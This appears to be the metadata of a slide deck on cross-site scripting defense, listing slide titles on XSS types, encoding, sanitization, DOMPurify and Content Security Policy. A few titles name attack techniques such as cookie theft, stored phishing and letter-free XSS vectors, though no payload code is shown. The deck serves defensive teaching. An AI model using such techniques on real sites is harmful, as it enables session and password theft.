      <vt:lpstr>  WARNING:  Please do not attempt to hack any computer system without legal permission to do so. Unauthorized computer hacking is illegal and can be punishable by a range of penalties including loss of job, monetary fines and possible imprisonment.    ALSO:  The Free and Open Source Software presented in these materials are examples of good secure development tools and techniques. You may have unknown legal, licensing or technical issues when making use of Free and Open Source Software. You should consult your company's policy on the use of Free and Open Source Software before making use of any software referenced in this material.</vt:lpstr>
      <vt:lpstr>XSS Defense:  Where are we going?</vt:lpstr>
      <vt:lpstr>XSS Defense Summary</vt:lpstr>
      <vt:lpstr>What is XSS?</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Consider the following URL…</vt:lpstr>
      <vt:lpstr>Reflected XSS</vt:lpstr>
      <vt:lpstr>Reflected XSS</vt:lpstr>
      <vt:lpstr>Persistent/Stored XSS Code Sample</vt:lpstr>
      <vt:lpstr>Persistent/Stored XSS</vt:lpstr>
      <vt:lpstr>DOM-Based XSS</vt:lpstr>
      <vt:lpstr>XSS Attack Payloads</vt:lpstr>
      <vt:lpstr>XSS Attack: Cookie Theft</vt:lpstr>
      <vt:lpstr>Stored XSS: Same Site Request Forgery</vt:lpstr>
      <vt:lpstr>XSS Undermining CSRF Defense (Twitter 2010)</vt:lpstr>
      <vt:lpstr>XSS Attack: Virtual Site Defacement</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>XSS Attack: Password Theft/Stored Phishing</vt:lpstr>
      <vt:lpstr>XSS With No Letters! https://inventropy.us/blog/constructing-an-xss-vector-using-no-letters </vt:lpstr>
      <vt:lpstr>alert(1) With No Letters or Numbers! https://www.jsf**k.com/ </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>XSS Defense</vt:lpstr>
      <vt:lpstr>Danger:  XSS Weak Defense Used</vt:lpstr>
      <vt:lpstr>XSS Defense Principles</vt:lpstr>
      <vt:lpstr>XSS Defense Summary</vt:lpstr>
      <vt:lpstr>XSS Defense 1: Encoding Libraries</vt:lpstr>
      <vt:lpstr>&lt;</vt:lpstr>
      <vt:lpstr>&amp;lt;</vt:lpstr>
      <vt:lpstr>HTML Entity Encoding</vt:lpstr>
      <vt:lpstr>Best Practice: Validate and Encode</vt:lpstr>
      <vt:lpstr>XSS Contexts</vt:lpstr>
      <vt:lpstr>Danger:  Multiple Contexts</vt:lpstr>
      <vt:lpstr>OWASP Java Encoder Project</vt:lpstr>
      <vt:lpstr>OWASP Java Encoder Project</vt:lpstr>
      <vt:lpstr>Microsoft Encoder and AntiXSS Library</vt:lpstr>
      <vt:lpstr>Microsoft Encoder and AntiXSS Library</vt:lpstr>
      <vt:lpstr>XSS Defense by Context</vt:lpstr>
      <vt:lpstr>XSS Defense by Context and Framework</vt:lpstr>
      <vt:lpstr>HTML Body Context</vt:lpstr>
      <vt:lpstr>XSS in HTML Body</vt:lpstr>
      <vt:lpstr>HTML Body Escaping Examples</vt:lpstr>
      <vt:lpstr>HTML Body Escaping Examples</vt:lpstr>
      <vt:lpstr>HTML Attribute Body Context</vt:lpstr>
      <vt:lpstr>XSS in HTML Attributes</vt:lpstr>
      <vt:lpstr>HTML Attribute Context</vt:lpstr>
      <vt:lpstr>HTML Attribute Escaping Examples</vt:lpstr>
      <vt:lpstr>HTML Attribute Escaping Examples</vt:lpstr>
      <vt:lpstr>URL Substring Contexts</vt:lpstr>
      <vt:lpstr>URL Fragment Escaping Examples</vt:lpstr>
      <vt:lpstr>URL Fragment Escaping Examples</vt:lpstr>
      <vt:lpstr>Protecting Untrusted Complete URLs</vt:lpstr>
      <vt:lpstr>Server-side URL Validation in Java</vt:lpstr>
      <vt:lpstr>Client-side URL Validation in React</vt:lpstr>
      <vt:lpstr>Escaping When Managing Complete URLs</vt:lpstr>
      <vt:lpstr>JavaScript Value Contexts</vt:lpstr>
      <vt:lpstr>XSS in JavaScript Context</vt:lpstr>
      <vt:lpstr>JavaScript Escaping Examples</vt:lpstr>
      <vt:lpstr>JavaScript Escaping Examples</vt:lpstr>
      <vt:lpstr>CSS Value Contexts</vt:lpstr>
      <vt:lpstr>XSS in the Style Context</vt:lpstr>
      <vt:lpstr>CSS Encoding Problems  Legacy Browsers</vt:lpstr>
      <vt:lpstr>CSS Encoding Examples</vt:lpstr>
      <vt:lpstr>CSS Encoding Examples</vt:lpstr>
      <vt:lpstr>Escaping Final Thoughts</vt:lpstr>
      <vt:lpstr>Dangerous Contexts</vt:lpstr>
      <vt:lpstr>Java XSS Defense Examples</vt:lpstr>
      <vt:lpstr>GO Template Contexts</vt:lpstr>
      <vt:lpstr>Review: XSS Defense Summary</vt:lpstr>
      <vt:lpstr>Advanced XSS Defense Techniques</vt:lpstr>
      <vt:lpstr>HTML Sanitization and XSS</vt:lpstr>
      <vt:lpstr>Review: XSS Defense Summary</vt:lpstr>
      <vt:lpstr>What is HTML sanitation?</vt:lpstr>
      <vt:lpstr>Examples</vt:lpstr>
      <vt:lpstr>HTML Sanitization: Bug 1</vt:lpstr>
      <vt:lpstr>HTML sanitation: Bug 2</vt:lpstr>
      <vt:lpstr>HTML sanitation: Bug 3</vt:lpstr>
      <vt:lpstr>OWASP HTML Sanitizer Project</vt:lpstr>
      <vt:lpstr>OWASP HTML Sanitizer Project</vt:lpstr>
      <vt:lpstr>HTML sanitizers by language</vt:lpstr>
      <vt:lpstr>DOMPurify : JavaScript Sanitizer</vt:lpstr>
      <vt:lpstr>Use DOMPurify to Sanitize Untrusted HTML</vt:lpstr>
      <vt:lpstr>DOM XSS</vt:lpstr>
      <vt:lpstr>Dangerous JavaScript functions</vt:lpstr>
      <vt:lpstr>Some safe JavaScript sinks</vt:lpstr>
      <vt:lpstr>Dangerous jQuery</vt:lpstr>
      <vt:lpstr>jQuery APIs and XSS</vt:lpstr>
      <vt:lpstr>jQuery: But there is more…</vt:lpstr>
      <vt:lpstr>Using Safe Functions Safely</vt:lpstr>
      <vt:lpstr>Fix the Broken Example</vt:lpstr>
      <vt:lpstr>Safe Client-Side JSON Handling</vt:lpstr>
      <vt:lpstr>Should you trust all JSON? (no)</vt:lpstr>
      <vt:lpstr>JSON.parse</vt:lpstr>
      <vt:lpstr>Pre-Fetching Data to Render in JS</vt:lpstr>
      <vt:lpstr>Pre-Fetching Data Safely</vt:lpstr>
      <vt:lpstr>https://github.com/yahoo/serialize-javascript</vt:lpstr>
      <vt:lpstr>iframe Sandboxing</vt:lpstr>
      <vt:lpstr>SOP and Basic Content Isolation</vt:lpstr>
      <vt:lpstr>Sandboxing</vt:lpstr>
      <vt:lpstr>iframe Sandboxing Values</vt:lpstr>
      <vt:lpstr>iFrame Sandboxing with srcdoc</vt:lpstr>
      <vt:lpstr>Final Thoughts</vt:lpstr>
      <vt:lpstr>Advanced XSS defense with no encoding!</vt:lpstr>
      <vt:lpstr>XSS Defense Summary</vt:lpstr>
      <vt:lpstr>Content Security Policy (CSP)</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>XSS Defense Summary</vt:lpstr>
      <vt:lpstr>Conclusion</vt:lpstr>
      <vt:lpstr>XSS Defense:  Summary</vt:lpstr>
      <vt:lpstr>jim@manicode.com</vt:lpstr>
      <vt:lpstr>Test for Cross-Site Scripting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Hess</dc:creator>
  <cp:lastModifiedBy>Jim Manico</cp:lastModifiedBy>
  <cp:revision>730</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-10-28T21:39:33Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-10-18T14:17:05Z</dcterms:modified>
</cp:coreProperties>
</file>